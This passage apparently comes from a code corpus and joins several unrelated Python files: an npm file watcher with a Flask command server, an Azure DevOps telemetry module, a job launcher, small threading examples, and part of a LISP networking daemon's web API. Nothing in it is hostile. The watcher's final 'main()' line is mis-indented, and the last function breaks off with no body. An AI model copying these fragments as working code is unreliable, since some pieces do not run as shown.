            any(filepath.endswith(ext) for ext in self._excluded_extensions)
            or any(folder in filepath for folder in self._excluded_folders)
            or any(name in filepath for name in self._excluded_files)
            or any(re.findall(pattern, filepath) for pattern in self._excluded_regex)
        )
        return included and not vetoed

    # TODO: This should be cached maybe
    def get_watched(self):
        """Get all the watched files, except for the first level folders
        in self._excluded_folders

        :returns: Watched Files
        :rtype: list
        """
        entries = os.listdir(".")
        candidates = [e for e in entries if os.path.isfile(e)]
        for folder in (e for e in entries if os.path.isdir(e)):
            if folder not in self._excluded_folders:
                candidates.extend(glob(folder + '/**', recursive=True))
        return [f for f in candidates if self.is_watched(f)]
def getext(filename):
    """Return the file extension of *filename*, lower-cased (with the dot)."""
    _, extension = os.path.splitext(filename)
    return extension.lower()
def get_now():
    """Return the current local time formatted as ``YYYY/MM/DD HH:MM:SS``."""
    current = datetime.datetime.now()
    return current.strftime("%Y/%m/%d %H:%M:%S")
def build():
    """Run the configured build command (if any) in a shell."""
    cmd = config.build_command
    print("Running build", cmd)
    if cmd:
        subprocess.run(cmd, shell=True)
    return "Building"
def test():
    """Run the configured test command (if any)."""
    print("Running \"test\"")
    cmd = config.test_command
    if cmd:
        subprocess.run(shlex.split(cmd), shell=True)
    return "Testing"
def start():
    """Run the configured start command (if any)."""
    print("Running \"start\"")
    cmd = config.start_command
    if cmd:
        subprocess.run(shlex.split(cmd), shell=True)
    return "Starting"
def run():
    """Run the configured run command (if any)."""
    print("Running \"run\"")
    cmd = config.run_command
    if cmd:
        subprocess.run(shlex.split(cmd), shell=True)
    return "Running"
# TODO: serve is a persistent command, should't be issued like that.
# Or perhaps if serve is called again, then simply stop the
# process and run again
def serve():
    """Run the configured serve command in a shell.

    BUG FIX: the original guarded on ``config.run_command`` but executed
    ``config.serve_command``; the guard now checks the command actually run.
    """
    print("Running \"serve\"")
    if config.serve_command:
        subprocess.run(config.serve_command, shell=True)
    return "Serving"
class ChangeHandler(FileSystemEventHandler):
    """Watchdog event handler that triggers build() when a watched file
    is created, modified, or deleted."""
    def __init__(self, root='.'):
        """Store the watch root and bind the module-level `config`."""
        self.root = root
        self.config = config
    def _build_if_watched(self, filepath):
        """Run build() if *filepath* is a file matched by the watch rules."""
        if os.path.isfile(filepath):
            # Watchdog reports absolute paths; is_watched() expects a path
            # relative to the watch root, so strip the root prefix.
            pwd = os.path.abspath(self.root) + '/'
            # print("filepath", filepath, pwd, pwd in filepath)
            filepath = str(filepath)
            assert pwd in filepath
            filepath = filepath.replace(pwd, '')
            watched = self.config.is_watched(filepath)
            if watched:
                print("file " + filepath + " is watched")
                build()
            else:
                # print("file " + filepath + " is not watched")
                pass
        else:
            # print(filepath + " is not a file")
            pass
    def on_created(self, event):
        """Handle file-creation events."""
        print("file " + event.src_path + " created")
        self._build_if_watched(event.src_path)
    def on_modified(self, event):
        """Handle file-modification events."""
        print("file " + event.src_path + " modified")
        self._build_if_watched(event.src_path)
    def on_deleted(self, event):
        """Handle file-deletion events."""
        print("file " + event.src_path + " deleted")
        self._build_if_watched(event.src_path)
# TODO: Display config.
# TODO: config should be reparseable, i.e., from an http wrapper if
# parse is called, config should be generated again.
config = Configuration()
def parse_options():
    """Parse command-line flags and store the results on the global `config`.

    Sets `config.watchdog`, `config.live_server`, and the include/exclude
    rules used by `Configuration.is_watched`.
    """
    parser = argparse.ArgumentParser(description="Watcher for JS node env")
    parser.add_argument("-w", "--watchdog", type=str, default="True",
                        help="Start watchdog?")
    parser.add_argument("-e", "--exclude", dest="exclusions",
                        default=".pdf,.tex,doc,bin,common,node_modules,build", required=False,
                        help="The extensions (.pdf for pdf files) or the folders to\
                        exclude from watch operations separated with commas")
    parser.add_argument("--exclude-filters", dest="exclude_filters",
                        default="#,~,.git", required=False,
                        help="Files with specific regex to exclude. Should not contain ',' ")
    parser.add_argument("--exclude-files", dest="excluded_files",
                        default="", required=False,
                        help="Specific files to exclude from watching")
    parser.add_argument("-i", "--include", dest="inclusions",
                        default=".css,.html,.js,.jsx", required=False,
                        help="The extensions (.pdf for pdf files) or the folders to\
                        exclude from watch operations separated with commas")
    parser.add_argument("--live-server", dest="live_server",
                        action='store_true',
                        help="Start a live server? Requires live-server to be installed\
                        in the nodejs global namespace")
    args = parser.parse_args()
    # --watchdog is a string flag; any value other than "true" disables it.
    if args.watchdog.lower() == "true":
        config.watchdog = True
    else:
        config.watchdog = False
    if args.live_server:
        config.live_server = True
    else:
        config.live_server = False
    # since it assumes that extensions startwith '.', I'll remove
    # the check from the globber later
    if args.exclude_filters:
        print("Excluding files for given filters",
              str(args.exclude_filters.split(',')))
        config.set_excluded_regex(args.exclude_filters.split(','))
    if args.inclusions:
        inclusions = args.inclusions
        inclusions = inclusions.split(",")
        config.set_included_extensions(
            [value for value in inclusions if value.startswith(".")])
    if args.excluded_files:
        for ef in args.excluded_files.split(','):
            assert type(ef) == str
        config.set_excluded_files(args.excluded_files.split(','))
    if args.exclusions:
        # Entries starting with '.' are extensions; the rest are folders.
        exclusions = args.exclusions
        exclusions = exclusions.split(",")
        excluded_extensions = [value for value in exclusions if value.startswith(".")]
        excluded_folders = list(set(exclusions) - set(excluded_extensions))
        config.set_excluded_extensions(excluded_extensions)
        config.set_excluded_folders(excluded_folders)
def main():
    """Entry point: verify npm exists, parse flags, optionally start the
    live server and the watchdog, then serve the npm-command HTTP API."""
    npm_path = which("npm")
    if not npm_path:
        print("npm executable must be in the path!")
        exit()
    parse_options()
    if config.live_server:
        print("Starting live server ...")
        # live-server runs as a child process; a thread drains its output.
        p = subprocess.Popen(['live-server', '--open=build'])
        t = Thread(target=p.communicate)
        t.start()
    else:
        print("Not starting live server ...")
    if config.watchdog:
        watched_elements = config.get_watched()
        print("Starting watchdog and watching ", watched_elements)
        event_handler = ChangeHandler()
        observer = Observer()
        observer.schedule(event_handler, os.getcwd(), recursive=True)
        observer.start()
    else:
        print("Not starting watchdog ...")
    port = config.server_port
    app = Flask("npm command server")
    # HTTP wrappers over the npm commands; each returns a short status string.
    @app.route("/build", methods=["GET", "POST"])
    def __build():
        return build()
    @app.route("/test", methods=["GET", "POST"])
    def __test():
        return test()
    @app.route("/run", methods=["GET", "POST"])
    def __run():
        return run()
    @app.route("/start", methods=["GET", "POST"])
    def __start():
        return start()
    @app.route("/serve", methods=["GET", "POST"])
    def __serve():
        return serve()
    print("Starting server on port %s" % str(port))
    app.run(host="127.0.0.1", port=port)
if __name__ == '__main__':
main()
|
telemetry.py | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import threading
from knack.log import get_logger
from azext_devops.devops_sdk.v5_0.customer_intelligence.models import CustomerIntelligenceEvent
logger = get_logger(__name__)
def try_send_telemetry_data(organization):
    """Fire-and-forget telemetry upload; never raises."""
    try:
        if not _is_telemetry_enabled():
            logger.debug('Azure devops telemetry disabled.')
            return
        logger.debug('Azure devops telemetry enabled.')
        _try_send_tracking_ci_event_async(organization)
    except BaseException as ex:  # pylint: disable=broad-except
        logger.debug(ex, exc_info=True)
        logger.debug('Azure devops telemetry sending failed.')
def set_tracking_data(**kwargs):
    """Populate the global tracking event from the parsed CLI arguments.

    Expects ``kwargs['args']`` to be the argparse namespace; never raises.
    """
    try:
        vsts_tracking_data.area = 'AzureDevopsCli'
        vsts_tracking_data.properties = {}
        command_line_args = vars(kwargs.get('args', None))
        command_line_split = command_line_args['command'].split()
        vsts_tracking_data.feature = command_line_split[0]
        if len(command_line_split) > 1:
            vsts_tracking_data.properties['Command'] = ' '.join(command_line_split[1:])
        # Record only the *names* of string-valued public options, never values.
        args = [key for key, value in command_line_args.items()
                if value and isinstance(value, str)
                and not key.startswith('_') and key != 'command']
        vsts_tracking_data.properties['Args'] = ' '.join(args)
        vsts_tracking_data.properties['ShellType'] = _get_shell_type()
        import sys
        vsts_tracking_data.properties['IsInteractive'] = str(sys.stdin.isatty())
        vsts_tracking_data.properties['OutputType'] = command_line_args['_output_format']
    except BaseException as ex:  # pylint: disable=broad-except
        logger.debug(ex, exc_info=True)
def _is_telemetry_enabled():
    """Return True unless the az CLI config sets collect_telemetry to 'no'."""
    from azure.cli.core import get_default_cli
    # Read the telemetry flag from az cli config file not the az devops extension config file
    az_config = get_default_cli().config
    if not az_config.has_option('core', 'collect_telemetry'):
        # Unset means opted in by default.
        return True
    return az_config.get('core', 'collect_telemetry') != 'no'
def _try_send_tracking_ci_event_async(organization=None):
    """Kick off _send_tracking_ci_event on a background thread, but only
    when the tracking payload has been populated (area and feature set)."""
    ready = (vsts_tracking_data is not None
             and vsts_tracking_data.area is not None
             and vsts_tracking_data.feature is not None)
    if not ready:
        logger.debug("Skipping telemetry to azure devops server.")
        return
    logger.debug("Logging telemetry to azure devops server.")
    try:
        threading.Thread(target=_send_tracking_ci_event,
                         args=[organization]).start()
    except BaseException as ex:  # pylint: disable=broad-except
        # we should always continue if we fail to set tracking data
        logger.debug(ex, exc_info=True)
def _send_tracking_ci_event(organization=None, ci_client=None):
    """Publish the module-level tracking event; return True on success.

    A customer-intelligence client is built for *organization* unless one
    is injected via *ci_client* (used by tests).
    """
    from .services import get_ci_client
    client = ci_client if ci_client is not None else \
        get_ci_client(organization=organization)
    try:
        client.publish_events([vsts_tracking_data])
    except BaseException as ex:  # pylint: disable=broad-except
        logger.debug(ex, exc_info=True)
        return False
    return True
# Mirrors azure cli's shell detection based on os environment variables.
def _get_shell_type():
    """Return a short name for the invoking shell, or a sanitized $SHELL
    value (None when $SHELL is unset) if no known marker variable is set."""
    import os
    markers = (('ZSH_VERSION', 'zsh'), ('BASH_VERSION', 'bash'),
               ('KSH_VERSION', 'ksh'), ('FCEDIT', 'ksh'), ('WINDIR', 'cmd'))
    for variable, shell in markers:
        if variable in os.environ:
            return shell
    return _remove_cmd_chars(_remove_symbols(os.environ.get('SHELL')))
def _remove_cmd_chars(s):
    """Replace quote characters with '_' and newlines with spaces.

    Non-string values (e.g. None) are passed through unchanged.
    """
    if not isinstance(s, str):
        return s
    return (s.replace("'", '_').replace('"', '_')
            .replace('\r\n', ' ').replace('\n', ' '))
def _remove_symbols(s):
    """Replace the shell metacharacters $ % ^ & | with '_'.

    For non-string input this deliberately falls through with no return,
    yielding None -- matching the original's behavior.
    """
    if isinstance(s, str):
        return s.translate(str.maketrans('$%^&|', '_____'))
# Module-level telemetry payload: populated by set_tracking_data() and
# published (on a background thread) by _send_tracking_ci_event().
vsts_tracking_data = CustomerIntelligenceEvent()
|
core.py | from messagebus import Bus
from configbus import Config
from threading import Thread
import subprocess
import time
# start jobs
class JobHandler(object):
    """Owns one child job process launched as 'python <job>.py'.

    start()/term() announce the transition on the message bus; poll()
    reports the child's exit code (None while it is still running or
    before it has been started).
    """

    def __init__(self, job):
        # 'logger.py' -> 'logger'; jobs are always named <name>.py.
        self.job_name = job[:-3]
        self.command = ['python', '{}'.format(job)]
        # Fix: the original initialized this to the builtin `object` type
        # as a placeholder; use None so "no process yet" is explicit.
        self.job = None
        self.status = False

    def start(self):
        """Spawn the job process and announce the startup on the bus."""
        self.job = subprocess.Popen(self.command)
        self.status = True
        time.sleep(1)
        Bus.logger.send(source='core', msg='{}-job startup'.format(self.job_name))

    def term(self):
        """Stop the job (no-op if not running) and announce the shutdown."""
        if self.status is True:
            Bus.logger.send(source='core', msg='{}-job shutdown'.format(self.job_name))
            # Give the logger job time to drain the shutdown message
            # before it is terminated.
            if self.job_name == 'logger':
                time.sleep(3)
            self.job.terminate()
            self.job.wait()
            self.status = False

    def poll(self):
        """Return the child's exit code, or None if running/not started."""
        if self.status is True:
            return self.job.poll()
def job_control(job):
    """Service start/stop requests for *job* from the display bus, forever.

    Expected message structure: {'action': 'start'} or {'action': 'stop'}.
    The monitoring flag in Config is kept in sync with the job state.
    """
    while True:
        request = Bus.display.receive()
        action = request['action']
        if action == 'stop':
            job.term()
            if job.job_name == 'monitoring':
                Config.monitoring.write(False)
        elif action == 'start':
            job.start()
            if job.job_name == 'monitoring':
                Config.monitoring.write(True)
def main():
    """Start the logger job, then babysit the monitoring job.

    A daemon thread services start/stop requests from the display bus;
    the main thread idles until Ctrl-C, then shuts everything down in
    order. (Python 2 file: note the print statement below.)
    """
    logger = JobHandler('logger.py')
    monitor = JobHandler('monitoring.py')
    try:
        Bus.logger.send(source='core', msg='core-job startup')
        logger.start()
        # Daemon thread: dies with the main thread on interpreter exit.
        t = Thread(target=job_control, args=(monitor,))
        t.setDaemon(True)
        t.start()
        # Idle loop; real work happens in the job_control thread.
        while True:
            time.sleep(10)
    except KeyboardInterrupt:
        print 'KeyboardInterrupt'
        monitor.term()
        logger.term()
        # Let the logger job flush before the buses disconnect.
        time.sleep(2)
        Bus.display.disconnect()
        Bus.logger.disconnect()
if __name__ == '__main__':
    main()
|
mini_event.py | import threading
class mini_event:
    """Minimal button-event dispatcher (down / up / hold).

    BUTTON_HOLD callbacks run on their own thread and receive
    (BUTTON_HOLD, dispatcher); other callbacks run inline and receive
    just the event id.
    """
    BUTTON_DOWN = 1
    BUTTON_UP = 2
    BUTTON_HOLD = 3

    # Class-level defaults kept for backward compatibility with code that
    # reads them off the class; instances get their own copies in __init__.
    subscribers = { BUTTON_DOWN: [], BUTTON_UP : [], BUTTON_HOLD: [] }
    trigger_hold_stop = False # Turned True when the hold callback must stop.

    def __init__(self):
        # Fix: the original shared ONE mutable subscribers dict across all
        # instances (mutable class attribute); give each instance its own
        # registry and its own hold-stop flag.
        self.subscribers = { self.BUTTON_DOWN: [], self.BUTTON_UP: [],
                             self.BUTTON_HOLD: [] }
        self.trigger_hold_stop = False

    def add_subscriber( self, callback, event ):
        """Register *callback* for *event* (one of the BUTTON_* ids)."""
        self.subscribers[event].append( callback )

    def fire_event( self, event ):
        """Invoke all callbacks registered for *event*.

        BUTTON_UP raises the hold-stop flag; BUTTON_DOWN clears it, so a
        long-running hold callback can poll trigger_hold_stop.
        """
        if( event == self.BUTTON_UP ):
            self.trigger_hold_stop = True
        if( event == self.BUTTON_DOWN ):
            self.trigger_hold_stop = False
        for callback in self.subscribers[event]:
            if( event == self.BUTTON_HOLD ):
                thread = threading.Thread(target=callback, args=[self.BUTTON_HOLD, self])
                thread.start()
            else:
                callback(event)
|
4.thread_lock.py | import threading
def job1():
    """Add 1 to the shared counter A ten times while holding the lock,
    printing the running total each step."""
    global A, lock
    with lock:
        for _ in range(10):
            A += 1
            print('job1', A)
def job2():
    """Add 10 to the shared counter A ten times while holding the lock,
    printing the running total each step."""
    global A, lock
    with lock:
        for _ in range(10):
            A += 10
            print('job2', A)
if __name__ == '__main__':
    # Two threads contend for the shared counter A; the lock serializes
    # them so job1's and job2's increments do not interleave.
    lock = threading.Lock()
    A = 0
    t1 = threading.Thread(target = job1)
    t2 = threading.Thread(target = job2)
    t1.start()
    t2.start()
|
lisp-core.py | # -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp-core.py
#
# This is the core process that is used to demux to the specific LISP
# functional components. The 4342 listen socket is centralized here.
#
#
# +------------- data encapsulation via network --------------+
# | |
# | IPC when mr & ms colocated |
# | +--------------------------------+ |
# | | | |
# | | IPC when mr & ddt colo | |
# | | +------------+ | |
# | | | | | |
# | | | v v v 4341
# +-------------+ +----------+ +----------+ +----------+ +----------+
# | lisp-[ir]tr | | lisp-mr | | lisp-ddt | | lisp-ms | | lisp-etr |
# +-------------+ +----------+ +----------+ +----------+ +----------+
# ^ IPC ^ IPC ^ IPC ^ IPC ^ IPC
# | | | | |
# | | | | |
# | | | | |
# +--------------+--------------+--------------+--------------+
# |
# | for dispatching control messages
# +-----------+
# | lisp-core |
# +-----------+
# | 4342
# |
# via network
#
# -----------------------------------------------------------------------------
import lisp
import lispconfig
import multiprocessing
import threading
import commands
import time
import os
import bottle
from cherrypy import wsgiserver
from cherrypy.wsgiserver.ssl_pyopenssl import pyOpenSSLAdapter
#from OpenSSL import SSL
import json
import sys
import socket
import thread
#------------------------------------------------------------------------------
#
# Global variables.
#
# Module globals, initialized empty here and filled in by startup code
# later in the file (sockets for the centralized 4342 control port and
# the per-process IPC channels).
lisp_build_date = ""
lisp_control_listen_socket = None
lisp_ipc_socket = None
lisp_ipc_control_socket = None
lisp_sockets = [None, None, None]
lisp_encap_socket = None
#------------------------------------------------------------------------------
#
# lisp_api_get
#
# Ask the LISP subsystem for configuration information.
#
@bottle.route('/lisp/api', method="get")
@bottle.route('/lisp/api/<command>', method="get")
@bottle.route('/lisp/api/<command>/<data_structure>', method="get")
def lisp_api_get(command = "", data_structure=""):
    """REST GET handler: return a configuration clause -- or dynamic data
    for 'data/<data_structure>' -- as JSON. Unauthenticated callers get
    [{"?": [{"?": "not-auth"}]}]. (Python 2: uses dict.keys()/values()
    as indexable lists.)
    """
    data = [{ "?" : [{"?" : "not-auth"}] }]

    #
    # Authenticate. Basic-auth credentials are checked against configured
    # user accounts; otherwise fall back to browser cookie validation.
    # Unauthenticated python user-agents are rejected outright.
    #
    if (bottle.request.auth != None):
        username, pw = bottle.request.auth
        if (lispconfig.lisp_find_user_account(username, pw) == False):
            return(json.dumps(data))
        #endif
    else:
        if (bottle.request.headers["User-Agent"].find("python") != -1):
            return(json.dumps(data))
        #endif
        if (lispconfig.lisp_validate_user() == False):
            return(json.dumps(data))
        #endif
    #endif

    #
    # First check for dynamic data. That is go get data from appropriate
    # process. Return from process in JSON format. The request body may
    # carry filter parameters (eid-prefix, address, etc.).
    #
    if (command == "data" and data_structure != ""):
        jdata = bottle.request.body.readline()
        data = json.loads(jdata) if jdata != "" else ""
        if (data != ""): data = data.values()[0]
        if (data == []): data = ""
        if (type(data) == dict and type(data.values()[0]) == dict):
            data = data.values()[0]
        #endif
        data = lisp_get_api_data(data_structure, data)
        return(data)
    #endif

    #
    # A valid user can access data now. The clause name comes either from
    # the URL or from the first key of the JSON request body.
    #
    if (command != ""):
        command = "lisp " + command
    else:
        jdata = bottle.request.body.readline()
        if (jdata == ""):
            data = [{ "?" : [{"?" : "no-body"}] }]
            return(json.dumps(data))
        #endif
        data = json.loads(jdata)
        command = data.keys()[0]
    #endif
    data = lispconfig.lisp_get_clause_for_api(command)
    return(json.dumps(data))
#enddef
#
# lisp_get_api_system
#
# Return system information in dictionary array (JSON format).
#
def lisp_get_api_system():
    """Return JSON system info: hostname, system and LISP uptimes, LISP
    version, whether a traceback log exists, and this node's v4/v6 RLOCs.
    (Python 2: uses the 'commands' module.)
    """
    data = {}
    data["hostname"] = socket.gethostname()
    data["system-uptime"] = commands.getoutput("uptime")
    data["lisp-uptime"] = lisp.lisp_print_elapsed(lisp.lisp_uptime)
    data["lisp-version"] = lisp.lisp_version

    # A traceback log on disk means some LISP process crashed previously.
    yesno = "yes" if os.path.exists("./logs/lisp-traceback.log") else "no"
    data["traceback-log"] = yesno

    v4 = lisp.lisp_myrlocs[0]
    v6 = lisp.lisp_myrlocs[1]
    v4 = "none" if (v4 == None) else v4.print_address_no_iid()
    v6 = "none" if (v6 == None) else v6.print_address_no_iid()
    data["lisp-rlocs"] = [v4, v6]
    return(json.dumps(data))
#enddef
#
# lisp_get_api_data
#
# Send IPC message to process that owns the dynamic data strucutre we
# are retrieving via the API. Variable data for the 'map-cache' and
# 'site-cache' API contains:
#
# { "eid-prefix" : <eid>, "group-prefix" : <group>, "instance-id" : <iid> }
#
# For 'map-resolver' and 'map-server" API contains:
#
# { "address" : <address>" } or { "dns-name" : <dns-name> }
#
def lisp_get_api_data(data_structure, data):
    """Send an IPC request for a dynamic data structure ('site-cache',
    'map-cache', 'system', 'map-resolver', 'map-server') to the process
    that owns it and return that process's JSON reply.

    Returns json.dumps([]) when the name is invalid or the owning process
    is not running. NOTE: the IPC lock is acquired only on branches that
    actually send, and released after the matching receive at the bottom
    -- every path that reaches the receive has acquired it.
    """
    valid_apis = ["site-cache", "map-cache", "system", "map-resolver",
        "map-server"]
    if (data_structure not in valid_apis): return(json.dumps([]))

    #
    # lisp-core process handles the system lispapi.get_system() API.
    #
    if (data_structure == "system"): return(lisp_get_api_system())

    #
    # Build IPC, acquire lock, and send IPC message. Then wait.
    # map-cache/map-resolver data lives in the RTR if running, else ITR.
    #
    if (data != ""): data = json.dumps(data)
    ipc = lisp.lisp_api_ipc("lisp-core", data_structure + "%" + data)

    if (data_structure in ["map-cache", "map-resolver"]):
        if (lisp.lisp_is_running("lisp-rtr")):
            lisp.lisp_ipc_lock.acquire()
            lisp.lisp_ipc(ipc, lisp_ipc_socket, "lisp-rtr")
        elif (lisp.lisp_is_running("lisp-itr")):
            lisp.lisp_ipc_lock.acquire()
            lisp.lisp_ipc(ipc, lisp_ipc_socket, "lisp-itr")
        else:
            return(json.dumps([]))
        #endif
    #endif
    if (data_structure == "map-server"):
        if (lisp.lisp_is_running("lisp-etr")):
            lisp.lisp_ipc_lock.acquire()
            lisp.lisp_ipc(ipc, lisp_ipc_socket, "lisp-etr")
        else:
            return(json.dumps([]))
        #endif
    #endif
    if (data_structure == "site-cache"):
        if (lisp.lisp_is_running("lisp-ms")):
            lisp.lisp_ipc_lock.acquire()
            lisp.lisp_ipc(ipc, lisp_ipc_socket, "lisp-ms")
        else:
            return(json.dumps([]))
        #endif
    #endif

    lisp.lprint("Waiting for api get-data '{}', parmameters: '{}'".format( \
        data_structure, data))

    opcode, source, port, output = lisp.lisp_receive(lisp_ipc_socket, True)
    lisp.lisp_ipc_lock.release()
    return(output)
#enddef
#
# lisp_api_put_delete
#
# Tell the LISP subsystem to add/replace or remove a command clause.
#
@bottle.route('/lisp/api', method="put")
@bottle.route('/lisp/api/<command>', method="put")
@bottle.route('/lisp/api/<command>', method="delete")
def lisp_api_put_delete(command = ""):
    """REST PUT/DELETE handler: add/replace (PUT) or remove (DELETE) a
    configuration clause supplied as JSON in the request body.

    Requires HTTP basic-auth; 'user-account' changes additionally require
    superuser. (Python 2: uses dict.keys() as an indexable list.)
    """
    data = [{ "?" : [{"?" : "not-auth"}] }]
    # NOTE(review): this early exit returns the raw python list, unlike
    # every other exit path which returns json.dumps() -- confirm callers
    # tolerate a non-JSON body here.
    if (bottle.request.auth == None): return(data)

    #
    # Authenticate.
    #
    if (bottle.request.auth != None):
        username, pw = bottle.request.auth
        if (lispconfig.lisp_find_user_account(username, pw) == False):
            return(json.dumps(data))
        #endif
    else:
        if (bottle.request.headers["User-Agent"].find("python") != -1):
            return(json.dumps(data))
        #endif
        if (lispconfig.lisp_validate_user() == False):
            return(json.dumps(data))
        #endif
    #endif

    #
    # If the request is to add, change, or remove a "user-account" command,
    # the validated user must be configured as a superuser.
    #
    if (command == "user-account"):
        if (lispconfig.lisp_is_user_superuser(username) == False):
            data = [{ "user-account" : [{"?" : "not-auth"}] }]
            return(json.dumps(data))
        #endif
    #endif

    #
    # A valid user can access data now. Clause name comes from the URL or
    # from the first key of the first JSON object in the body.
    #
    jdata = bottle.request.body.readline()
    if (jdata == ""):
        data = [{ "?" : [{"?" : "no-body"}] }]
        return(json.dumps(data))
    #endif

    data = json.loads(jdata)
    if (command != ""):
        command = "lisp " + command
    else:
        command = data[0].keys()[0]
    #endif

    #
    # Add, replace, or remove lines from configuration file. Grab config
    # file lock.
    #
    lisp.lisp_ipc_lock.acquire()
    if (bottle.request.method == "DELETE"):
        data = lispconfig.lisp_remove_clause_for_api(data)
    else:
        data = lispconfig.lisp_put_clause_for_api(data)
    #endif
    lisp.lisp_ipc_lock.release()
    return(json.dumps(data))
#enddef
#
# lisp_show_api_doc
#
@bottle.route('/lisp/show/api-doc', method="get")
def lisp_show_api_doc():
    """Regenerate lispapi.txt with pydoc (when lispapi.py is present) and
    serve it as a static file."""
    if os.path.exists("lispapi.py"):
        os.system("pydoc lispapi > lispapi.txt")
    if (os.path.exists("lispapi.txt") == False):
        return("lispapi.txt file not found")
    return bottle.static_file("lispapi.txt", root="./")
#enddef
#
# lisp_show_command_doc
#
@bottle.route('/lisp/show/command-doc', method="get")
def lisp_show_comamnd_doc():
    """Serve the example configuration file as the command documentation.
    (The misspelled function name is kept -- only bottle references it.)"""
    doc = bottle.static_file("lisp.config.example", root="./",
        mimetype="text/plain")
    return doc
#enddef
#
# lisp_show_lisp_xtr
#
# Display the show-xtr file that the go data-plane lisp-xtr writes to.
#
@bottle.route('/lisp/show/lisp-xtr', method="get")
def lisp_show_lisp_xtr():
    """Render the data-plane stats file ('show-ztr' if present, otherwise
    'show-xtr' from the lispers.net go data-plane) as HTML."""
    if (lispconfig.lisp_validate_user() == False):
        return(lisp_core_login_page())
    #endif

    #
    # Special case to look for a other data-planes. If it does not exist,
    # check the lispers.net go data-plane. Fix: use a context manager so
    # the file descriptor is closed even if read() raises (the original
    # leaked it on that path).
    #
    filename = "./show-ztr" if os.path.exists("./show-ztr") else "./show-xtr"
    with open(filename, "r") as f:
        contents = f.read()
    #endwith

    #
    # Preserve 2/4-space leading indentation with HTML spacing and turn
    # newlines into <br>. NOTE(review): a 4-space line matches BOTH tests
    # below and gets space(4)+space(2) -- preserved from the original,
    # confirm whether an elif was intended.
    #
    new = ""
    for line in contents.split("\n"):
        if (line[0:4] == "    "): new += lisp.lisp_space(4)
        if (line[0:2] == "  "): new += lisp.lisp_space(2)
        new += line + "<br>"
    #endfor
    new = lisp.convert_font(new)
    return(lisp.lisp_print_sans(new))
#enddef
#
# lisp_show_keys
#
# Display LISP crypto-key-list to ITR, ETR, RTR.
#
@bottle.route('/lisp/show/<xtr>/keys', method="get")
def lisp_show_keys(xtr):
    """Show the crypto-key-list for 'itr', 'etr' or 'rtr'; superuser only."""
    if (lispconfig.lisp_validate_user() == False):
        return(lisp_core_login_page())
    #endif

    def refuse(message):
        return lispconfig.lisp_show_wrapper(lisp.lisp_print_cour(message))

    if lispconfig.lisp_is_user_superuser(None) == False:
        return refuse("Permission denied")
    if xtr not in ["itr", "etr", "rtr"]:
        return refuse("Invalid URL")
    return lispconfig.lisp_process_show_command(lisp_ipc_socket,
        "show {}-keys".format(xtr))
#enddef
#
# lisp_show_geo_map
#
# Use Google Maps API to draw a circle on a geographical map. The html file
# ./lispers.net-geo.html is javascript to call the Google API.
#
@bottle.route('/lisp/geo-map/<geo_prefix>')
def lisp_show_geo_map(geo_prefix):
    """Render ./lispers.net-geo.html with $LAT/$LON/$RADIUS substituted
    from the URL's geo-prefix so the browser can draw the coverage circle
    via the Google Maps API."""
    if (lispconfig.lisp_validate_user() == False):
        return(lisp_core_login_page())
    #endif

    #
    # The URL encodes the prefix with '-' separators; the final component
    # is the mask length, re-joined here as "<geo>/<len>".
    #
    geo_prefix = geo_prefix.split("-")
    geo_prefix = "-".join(geo_prefix[0:-1]) + "/" + geo_prefix[-1]

    geo = lisp.lisp_geo("")
    geo.parse_geo_string(geo_prefix)
    lat, lon = geo.dms_to_decimal()
    radius = geo.radius * 1000

    #
    # Fix: use a context manager so the template file is closed even when
    # read() raises (the original left it open on that path).
    #
    with open("./lispers.net-geo.html", "r") as template:
        html = template.read()
    #endwith
    html = html.replace("$LAT", str(lat))
    html = html.replace("$LON", str(lon))
    html = html.replace("$RADIUS", str(radius))
    return(html)
#enddef
#
# lisp_core_login_page
#
# Print to browser landing page.
#
@bottle.route('/lisp/login', method="get")
def lisp_core_login_page():
    """Render the browser login page."""
    return lispconfig.lisp_login_page()
#enddef
#
# lisp_core_do_login
#
# Get login info entered in forms data. Validate and add to cookie database.
# If valid, take user to landing page. Othereise, go back to login page.
#
@bottle.route('/lisp/login', method="post")
def lisp_core_do_login():
    """Validate the posted credentials: on success show the landing page,
    otherwise re-display the login form."""
    if lispconfig.lisp_validate_user():
        return lispconfig.lisp_landing_page()
    return lisp_core_login_page()
#enddef
#
# lisp_core_landing_page
#
# Print to browser landing page.
#
@bottle.route('/lisp')
def lisp_core_landing_page():
    """Main landing page; requires a validated browser session."""
    if (lispconfig.lisp_validate_user() == False):
        return lisp_core_login_page()
    return lispconfig.lisp_landing_page()
#enddef
#
# lisp_core_traceback_page
#
# Look in log files for Traceback messages.
#
@bottle.route('/lisp/traceback')
def lisp_core_traceback_page():
    """Report python Tracebacks found in the LISP log files."""
    if (lispconfig.lisp_validate_user() == False):
        return(lisp_core_login_page())
    #endif
    clean = True

    #
    # Check explicit lisp-traceback.log.
    #
    if (os.path.exists("./logs/lisp-traceback.log")):
        output = commands.getoutput("cat ./logs/lisp-traceback.log")
        if (output):
            output = output.replace("----------", "<b>----------</b>")
            output = output.replace("\n", "<br>")
            clean = False
        #endif
    #endif

    #
    # Look for Traceback messages in log files. Fix: getoutput() returns
    # ONE string and the original iterated it character by character;
    # split into lines so each grep hit is examined whole.
    #
    if (clean):
        output = ""
        cmd = "egrep --with-filename Traceback ./logs/*.log"
        log_files = commands.getoutput(cmd).split("\n")
        for lf in log_files:
            if (lf.find(":") == -1): continue
            line = lf.split(":")
            if (line[1] == "0"): continue
            output += "Found Tracebacks in log file {}<br>".format(line[0])
            clean = False
        #endfor
        output = output[0:-4]
    #endif

    if (clean):
        output = "No Tracebacks found - a stable system is a happy system"
    #endif
    output = lisp.lisp_print_cour(output)
    return(lispconfig.lisp_show_wrapper(output))
#enddef
#
# lisp_core_not_supported
#
# Print to browser landing page.
#
@bottle.route('/lisp/show/not-supported')
def lisp_core_not_supported():
    """Placeholder page for features this build does not support."""
